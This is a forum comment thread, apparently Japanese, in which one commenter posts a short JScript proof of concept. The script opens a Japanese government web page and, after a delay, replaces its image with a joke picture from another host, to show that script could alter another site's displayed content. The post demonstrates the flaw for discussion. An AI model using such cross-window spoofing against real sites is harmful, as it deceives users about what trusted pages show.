アカウント名:
パスワード:
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
あつくて寝られない時はhackしろ! 386BSD(98)はそうやってつくられましたよ? -- あるハッカー
脅威はクッキーやファイルだけではない (スコア:3, 参考になる)
たとえば下のJScriptを実行してみると、あるはずのない画面が現れます。これはサーバのデータを改竄したのではなく、ブラウザ上で差し替えただけです。JScriptにとって本来これはできてはならないはずのことです。
<SCRIPT>
var w = document.open("http://www.itkoza.go.jp/n_sori/k_1/k_1_2.html","","");
setTimeout('w.document.images[0].src = "http://www.topstudio.co.jp/~kmuto/joke/inpaku_saiko_150.jpg";', 2000);
</SCRIPT>
Re:脅威はクッキーやファイルだけではない (スコア:0)